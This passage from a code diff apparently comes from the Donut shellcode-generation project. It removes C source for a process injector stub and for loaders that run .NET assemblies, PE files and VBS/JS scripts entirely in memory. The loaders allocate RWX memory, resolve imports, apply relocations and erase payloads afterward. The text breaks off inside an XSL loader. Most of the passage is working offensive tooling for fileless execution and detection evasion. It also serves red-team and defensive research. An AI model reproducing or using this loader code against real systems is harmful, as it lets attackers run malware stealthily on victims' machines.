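-pid=atoi(argv[1]);
-if(pid==0) pid=name2pid(argv[1]);
-
-if(pid==0) {
-printf(" [ unable to obtain process id.\n");
-return 0;
-}
-// pic
-code_len = getdata(argv[2], &code);
-if(code_len == 0) {
-printf(" [ unable to read payload.\n");
-return 0;
-}
-injectPIC(pid, code, code_len);
-free(code);
-return 0;
-}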
+0
-364
payload/inmem_dotnet.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
32 PDONUT_MODULE mod;
33 HRESULT hr = S_OK;
34 BSTR domain;
35 SAFEARRAYBOUND sab;
36 SAFEARRAY *sa;
37 DWORD i;
38 BOOL loaded=FALSE, loadable;
39 PBYTE p;
40
41 if(inst->type == DONUT_INSTANCE_PIC) {
42 DPRINT("Using module embedded in instance");
43 mod = (PDONUT_MODULE)&inst->module.x;
44 } else {
45 DPRINT("Loading module from allocated memory");
46 mod = inst->module.p;
47 }
48
49 if(inst->api.CLRCreateInstance != NULL) {
50 DPRINT("CLRCreateInstance");
51
52 hr = inst->api.CLRCreateInstance(
53 (REFCLSID)&inst->xCLSID_CLRMetaHost,
54 (REFIID)&inst->xIID_ICLRMetaHost,
55 (LPVOID*)&pa->icmh);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime);
59
60 hr = pa->icmh->lpVtbl->GetRuntime(
61 pa->icmh, mod->runtime,
62 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
63
64 if(SUCCEEDED(hr)) {
65 DPRINT("ICLRRuntimeInfo::IsLoadable");
66 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
67
68 if(SUCCEEDED(hr) && loadable) {
69 DPRINT("ICLRRuntimeInfo::GetInterface");
70
71 hr = pa->icri->lpVtbl->GetInterface(
72 pa->icri,
73 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
74 (REFIID)&inst->xIID_ICorRuntimeHost,
75 (LPVOID)&pa->icrh);
76
77 DPRINT("HRESULT: %08lx", hr);
78 }
79 } else pa->icri = NULL;
80 } else pa->icmh = NULL;
81 }
82 if(FAILED(hr)) {
83 DPRINT("CorBindToRuntime");
84
85 hr = inst->api.CorBindToRuntime(
86 NULL, // load whatever's available
87 NULL, // load workstation build
88 &inst->xCLSID_CorRuntimeHost,
89 &inst->xIID_ICorRuntimeHost,
90 (LPVOID*)&pa->icrh);
91
92 DPRINT("HRESULT: %08lx", hr);
93 }
94
95 if(FAILED(hr)) {
96 pa->icrh = NULL;
97 return FALSE;
98 }
99 DPRINT("ICorRuntimeHost::Start");
100
101 hr = pa->icrh->lpVtbl->Start(pa->icrh);
102
103 if(SUCCEEDED(hr)) {
104 domain = inst->api.SysAllocString(mod->domain);
105
106 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain);
107
108 hr = pa->icrh->lpVtbl->CreateDomain(
109 pa->icrh, domain, NULL, &pa->iu);
110
111 inst->api.SysFreeString(domain);
112
113 if(SUCCEEDED(hr)) {
114 DPRINT("IUnknown::QueryInterface");
115
116 hr = pa->iu->lpVtbl->QueryInterface(
117 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
118
119 if(SUCCEEDED(hr)) {
120 sab.lLbound = 0;
121 sab.cElements = mod->len;
122 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
123
124 if(sa != NULL) {
125 DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len);
126
127 for(i=0, p=sa->pvData; i<mod->len; i++) {
128 p[i] = mod->data[i];
129 }
130
131 DPRINT("AppDomain::Load_3");
132
133 hr = pa->ad->lpVtbl->Load_3(
134 pa->ad, sa, &pa->as);
135
136 loaded = hr == S_OK;
137
138 DPRINT("HRESULT : %08lx", hr);
139
140 DPRINT("Erasing assembly from memory");
141
142 for(i=0, p=sa->pvData; i<mod->len; i++) {
143 p[i] = mod->data[i] = 0;
144 }
145
146 DPRINT("SafeArrayDestroy");
147 inst->api.SafeArrayDestroy(sa);
148 }
149 }
150 }
151 }
152 return loaded;
153 }
154
155 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
156 SAFEARRAY *sav=NULL, *params=NULL;
157 VARIANT arg, ret, vtPsa, v1={0}, v2;
158 DWORD i;
159 PDONUT_MODULE mod;
160 HRESULT hr;
161 BSTR cls, method;
162 ULONG cnt;
163 OLECHAR str[1]={0};
164 LONG ucnt, lcnt;
165
166 if(inst->type == DONUT_INSTANCE_PIC) {
167 DPRINT("Using module embedded in instance");
168 mod = (PDONUT_MODULE)&inst->module.x;
169 } else {
170 DPRINT("Loading module from allocated memory");
171 mod = inst->module.p;
172 }
173
174 DPRINT("Type is %s",
175 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
176
177 // if this is a program
178 if(mod->type == DONUT_MODULE_NET_EXE) {
179 // get the entrypoint
180 DPRINT("MethodInfo::EntryPoint");
181 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
182
183 if(SUCCEEDED(hr)) {
184 // get the parameters for entrypoint
185 DPRINT("MethodInfo::GetParameters");
186 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &params);
187
188 if(SUCCEEDED(hr)) {
189 DPRINT("SafeArrayGetLBound");
190 hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt);
191
192 DPRINT("SafeArrayGetUBound");
193 hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt);
194 cnt = ucnt - lcnt + 1;
195 DPRINT("Number of parameters for entrypoint : %i", cnt);
196
197 // does Main require string[] args?
198 if(cnt != 0) {
199 // create a 1 dimensional array for Main parameters
200 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
201 // if user specified their own parameters, add to string array
202 if(mod->param_cnt != 0) {
203 // create 1 dimensional array for strings[] args
204 vtPsa.vt = (VT_ARRAY | VT_BSTR);
205 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt);
206
207 // add each string parameter
208 for(i=0; i<mod->param_cnt; i++) {
209 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1));
210
211 inst->api.SafeArrayPutElement(vtPsa.parray,
212 &i, inst->api.SysAllocString(mod->param[i]));
213 }
214 } else {
215 DPRINT("Adding empty string for invoke_3");
216 // add empty string to make it work
217 // create 1 dimensional array for strings[] args
218 vtPsa.vt = (VT_ARRAY | VT_BSTR);
219 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
220
221 i=0;
222 inst->api.SafeArrayPutElement(vtPsa.parray,
223 &i, inst->api.SysAllocString(str));
224 }
225 // add string array to list of parameters
226 i=0;
227 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
228 }
229 v1.vt = VT_NULL;
230 v1.plVal = NULL;
231
232 DPRINT("MethodInfo::Invoke_3()\n");
233
234 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
235
236 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
237 hr, SUCCEEDED(hr) ? "Success" : "Failed");
238
239 if(sav != NULL) {
240 inst->api.SafeArrayDestroy(vtPsa.parray);
241 inst->api.SafeArrayDestroy(sav);
242 }
243 }
244 } else pa->mi = NULL;
245 } else {
246 DPRINT("SysAllocString(\"%ws\")", mod->cls);
247 cls = inst->api.SysAllocString(mod->cls);
248 if(cls == NULL) return FALSE;
249
250 DPRINT("SysAllocString(\"%ws\")", mod->method);
251 method = inst->api.SysAllocString(mod->method);
252
253 if(method != NULL) {
254 DPRINT("Assembly::GetType_2");
255 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
256
257 if(SUCCEEDED(hr)) {
258 sav = NULL;
259 if(mod->param_cnt != 0) {
260 DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt);
261
262 sav = inst->api.SafeArrayCreateVector(
263 VT_VARIANT, 0, mod->param_cnt);
264
265 if(sav != NULL) {
266 for(i=0; i<mod->param_cnt; i++) {
267 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1));
268
269 V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]);
270 V_VT(&arg) = VT_BSTR;
271
272 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
273
274 if(FAILED(hr)) {
275 DPRINT("SafeArrayPutElement failed.");
276 inst->api.SafeArrayDestroy(sav);
277 sav = NULL;
278 }
279 }
280 }
281 }
282 if(SUCCEEDED(hr)) {
283 DPRINT("Calling Type::InvokeMember_3");
284
285 hr = pa->type->lpVtbl->InvokeMember_3(
286 pa->type,
287 method, // name of method
288 BindingFlags_InvokeMethod |
289 BindingFlags_Static |
290 BindingFlags_Public,
291 NULL,
292 v1, // empty VARIANT
293 sav, // arguments to method
294 &ret); // return code from method
295
296 DPRINT("Type::InvokeMember_3 : %08lx : %s",
297 hr, SUCCEEDED(hr) ? "Success" : "Failed");
298
299 if(sav != NULL) {
300 inst->api.SafeArrayDestroy(sav);
301 }
302 }
303 }
304 inst->api.SysFreeString(method);
305 }
306 inst->api.SysFreeString(cls);
307 }
308 return TRUE;
309 }
310
311 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
312
313 if(pa->type != NULL) {
314 DPRINT("Type::Release");
315 pa->type->lpVtbl->Release(pa->type);
316 pa->type = NULL;
317 }
318
319 if(pa->mi != NULL) {
320 DPRINT("MethodInfo::Release");
321 pa->mi->lpVtbl->Release(pa->mi);
322 pa->mi = NULL;
323 }
324
325 if(pa->as != NULL) {
326 DPRINT("Assembly::Release");
327 pa->as->lpVtbl->Release(pa->as);
328 pa->as = NULL;
329 }
330
331 if(pa->ad != NULL) {
332 DPRINT("AppDomain::Release");
333 pa->ad->lpVtbl->Release(pa->ad);
334 pa->ad = NULL;
335 }
336
337 if(pa->iu != NULL) {
338 DPRINT("IUnknown::Release");
339 pa->iu->lpVtbl->Release(pa->iu);
340 pa->iu = NULL;
341 }
342
343 if(pa->icrh != NULL) {
344 DPRINT("ICorRuntimeHost::Stop");
345 pa->icrh->lpVtbl->Stop(pa->icrh);
346
347 DPRINT("ICorRuntimeHost::Release");
348 pa->icrh->lpVtbl->Release(pa->icrh);
349 pa->icrh = NULL;
350 }
351
352 if(pa->icri != NULL) {
353 DPRINT("ICLRRuntimeInfo::Release");
354 pa->icri->lpVtbl->Release(pa->icri);
355 pa->icri = NULL;
356 }
357
358 if(pa->icmh != NULL) {
359 DPRINT("ICLRMetaHost::Release");
360 pa->icmh->lpVtbl->Release(pa->icmh);
361 pa->icmh = NULL;
362 }
363 }
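--- a/payload/inmem_pe.c
+++ /dev/null
@@ -1,249 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifdef _WIN64
-#define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
-#else
-#define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
-#endif
-
-typedef struct _IMAGE_RELOC {
-WORD offset :12;
-WORD type :4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-
-typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
-typedef VOID (WINAPI *Start_t)(VOID);
-
-typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
-
-// same as strcmp
-int xstrcmp(char *s1, char *s2) {
-while(*s1 && (*s1==*s2))s1++,s2++;
-return (int)*(unsigned char*)s1 - *(unsigned char*)s2;
-}
-
-// In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
-VOID RunPE(PDONUT_INSTANCE inst) {
-PIMAGE_DOS_HEADER dos, doshost;
-PIMAGE_NT_HEADERS nt, nthost;
-PIMAGE_SECTION_HEADER sh;
-PIMAGE_THUNK_DATA oft, ft;
-PIMAGE_IMPORT_BY_NAME ibn;
-PIMAGE_IMPORT_DESCRIPTOR imp;
-PIMAGE_EXPORT_DIRECTORY exp;
-PIMAGE_RELOC list;
-PIMAGE_BASE_RELOCATION ibr;
-DWORD rva;
-PDWORD adr;
-PDWORD sym;
-PWORD ord;
-PBYTE ofs;
-PCHAR str, name;
-HMODULE dll;
-ULONG_PTR ptr;
-DllMain_t DllMain; // DLL
-Start_t Start; // EXE
-call_stub_t CallApi; // DLL function
-LPVOID cs = NULL, base, host;
-DWORD i, cnt;
-PDONUT_MODULE mod;
-FARPROC api=NULL; // DLL export
-
-// write shellcode to stack. msvc sux!!
-#include "call_api_bin.h"
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-base = mod->data;
-dos = (PIMAGE_DOS_HEADER)base;
-nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
-
-// before doing anything. check compatibility between exe/dll and host process.
-host = inst->api.GetModuleHandle(NULL);
-doshost = (PIMAGE_DOS_HEADER)host;
-nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
-
-if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
-DPRINT("Host process and payload are not compatiable...cannot load.");
-return;
-}
-
-DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
-nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
-
-cs = inst->api.VirtualAlloc(
-NULL, nt->OptionalHeader.SizeOfImage + 4096,
-MEM_COMMIT | MEM_RESERVE,
-PAGE_EXECUTE_READWRITE);
-
-if(cs == NULL) return;
-
-DPRINT("Copying each section to RWX memory %p", cs);
-sh = IMAGE_FIRST_SECTION(nt);
-
-for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
-Memcpy((PBYTE)cs + sh[i].VirtualAddress,
-(PBYTE)base + sh[i].PointerToRawData,
-sh[i].SizeOfRawData);
-}
-
-DPRINT("Processing the Import Table");
-rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
-imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
-
-// For each DLL
-for (;imp->Name!=0; imp++) {
-name = RVA2VA(PCHAR, cs, imp->Name);
-
-DPRINT("Loading %s", name);
-dll = inst->api.LoadLibraryA(name);
-
-// Resolve the API for this library
-oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
-ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
-
-// For each API
-for (;; oft++, ft++) {
-// No API left?
-if (oft->u1.AddressOfData == 0) break;
-
-PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
-
-// Resolve by ordinal?
-if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
-*func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
-} else {
-// Resolve by name
-ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
-*func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
-}
-}
-}
-
-DPRINT("Applying Relocations");
-rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
-ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
-ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
-
-while(ibr->VirtualAddress != 0) {
-list = (PIMAGE_RELOC)(ibr + 1);
-
-while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
-if(list->type == IMAGE_REL_TYPE) {
-*(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
-} else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
-DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type);
-goto pe_cleanup;
-}
-list++;
-}
-ibr = (PIMAGE_BASE_RELOCATION)list;
-}
-
-if(mod->type == DONUT_MODULE_DLL) {
-// call exported api?
-if(mod->method[0] != 0) {
-DPRINT("Resolving address of %s", (char*)mod->method);
-
-rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
-
-if(rva != 0) {
-exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
-cnt = exp->NumberOfNames;
-
-DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
-
-if(cnt != 0) {
-adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
-sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
-ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
-
-do {
-str = RVA2VA(PCHAR, cs, sym[cnt-1]);
-if(!xstrcmp(str, (char*)mod->method)) {
-api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]);
-break;
-}
-} while (--cnt);
-
-if(api != NULL) {
-CallApi = inst->api.VirtualAlloc(
-NULL,
-sizeof(CALL_API_BIN),
-MEM_COMMIT | MEM_RESERVE,
-PAGE_EXECUTE_READWRITE);
-
-if(CallApi != NULL) {
-DPRINT("Calling %s via code stub.", (char*)mod->method);
-Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN));
-CallApi(api, mod->param_cnt, mod->param);
-DPRINT("Erasing code stub");
-Memset(CallApi, 0, sizeof(CALL_API_BIN));
-inst->api.VirtualFree(CallApi, 0, MEM_DECOMMIT | MEM_RELEASE);
-}
-} else {
-DPRINT("Unable to resolve API");
-goto pe_cleanup;
-}
-}
-}
-} else {
-DPRINT("Executing entrypoint of DLL\n\n");
-DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
-DllMain(host, DLL_PROCESS_ATTACH, NULL);
-}
-} else {
-// The problem with executing EXE files:
-// 1) They use subsystems either GUI or CUI
-// 2) They call ExitProcess ...will need to review support of this later.
-DPRINT("Executing entrypoint of EXE\n\n");
-Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
-Start();
-}
-pe_cleanup:
-// if memory allocated
-if(cs != NULL) {
-// DPRINT("Erasing %" PRIi32 " bytes of memory at %p",
-// nt->OptionalHeader.SizeOfImage, cs);
-// erase from memory (disabled for now)
-// Memset(cs, 0, nt->OptionalHeader.SizeOfImage);
-// release
-DPRINT("Releasing memory");
-inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
-}
-}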
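--- a/payload/inmem_script.c
+++ /dev/null
@@ -1,156 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-VOID RunScript(PDONUT_INSTANCE inst) {
-HRESULT hr;
-IActiveScriptParse *parser;
-IActiveScript *engine;
-MyIActiveScriptSite mas;
-IActiveScriptSiteVtbl activescript_vtbl;
-IHostVtbl wscript_vtbl;
-PDONUT_MODULE mod;
-PWCHAR script;
-ULONG64 len;
-BSTR obj;
-BOOL disabled;
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-// 1. Allocate memory for unicode format of script
-script = (PWCHAR)inst->api.VirtualAlloc(
-NULL,
-(inst->mod_len + 1) * sizeof(WCHAR),
-MEM_COMMIT | MEM_RESERVE,
-PAGE_READWRITE);
-
-// 2. Convert string to unicode.
-if(script != NULL) {
-// 2. Convert string to unicode.
-inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
--1, script, mod->len * sizeof(WCHAR));
-
-// we're using stack memory for the virtual function table
-mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
-ActiveScript_New(inst, &mas.site);
-
-mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
-Host_New(inst, &mas.wscript);
-
-mas.siteWnd.lpVtbl = NULL;
-
-// 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method
-DPRINT("CoInitializeEx");
-hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
-
-if(hr == S_OK) {
-// 5. Instantiate the active script engine
-DPRINT("CoCreateInstance(IID_IActiveScript)");
-
-hr = inst->api.CoCreateInstance(
-&inst->xCLSID_ScriptLanguage, 0,
-CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
-&inst->xIID_IActiveScript, (void **)&engine);
-
-if(hr == S_OK) {
-// 6. Get IActiveScriptParse object from engine
-DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
-
-hr = engine->lpVtbl->QueryInterface(
-engine,
-#ifdef _WIN64
-&inst->xIID_IActiveScriptParse64,
-#else
-&inst->xIID_IActiveScriptParse32,
-#endif
-(void **)&parser);
-
-if(hr == S_OK) {
-// 7. Initialize parser
-DPRINT("IActiveScriptParse::InitNew");
-hr = parser->lpVtbl->InitNew(parser);
-
-if(hr == S_OK) {
-// 8. Set custom script interface
-DPRINT("IActiveScript::SetScriptSite");
-mas.wscript.lpEngine = engine;
-
-hr = engine->lpVtbl->SetScriptSite(
-engine, (IActiveScriptSite *)&mas);
-
-if(hr == S_OK) {
-DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript);
-obj = inst->api.SysAllocString(inst->wscript);
-hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
-inst->api.SysFreeString(obj);
-
-if(hr == S_OK) {
-// 9. Load script
-DPRINT("IActiveScriptParse::ParseScriptText");
-hr = parser->lpVtbl->ParseScriptText(
-parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
-
-if(hr == S_OK) {
-// 10. Run script
-DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
-hr = engine->lpVtbl->SetScriptState(
-engine, SCRIPTSTATE_CONNECTED);
-
-// SetScriptState blocks here
-}
-}
-}
-}
-DPRINT("IActiveScriptParse::Release");
-parser->lpVtbl->Release(parser);
-}
-DPRINT("IActiveScript::Close");
-engine->lpVtbl->Close(engine);
-
-DPRINT("IActiveScript::Release");
-engine->lpVtbl->Release(engine);
-}
-}
-DPRINT("Erasing script from memory");
-Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
-
-DPRINT("VirtualFree(script)");
-inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
-}
-}
-
-#include "activescript.c"
-#include "wscript.c"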
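--- a/payload/inmem_xsl.c
+++ /dev/null
@@ -1,109 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-VOID RunXSL(PDONUT_INSTANCE inst) {
-IXMLDOMDocument *pDoc;
-IXMLDOMNode *pNode;
-HRESULT hr;
-PWCHAR xsl_str;
-VARIANT_BOOL loaded;
-BSTR res;
-PDONUT_MODULE mod;
-ULONG64 len;
-UCHAR c;
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-// 1. Allocate RW memory for unicode format of script
-xsl_str = (PWCHAR)inst->api.VirtualAlloc(
-NULL,
-(inst->mod_len + 1) * sizeof(WCHAR),
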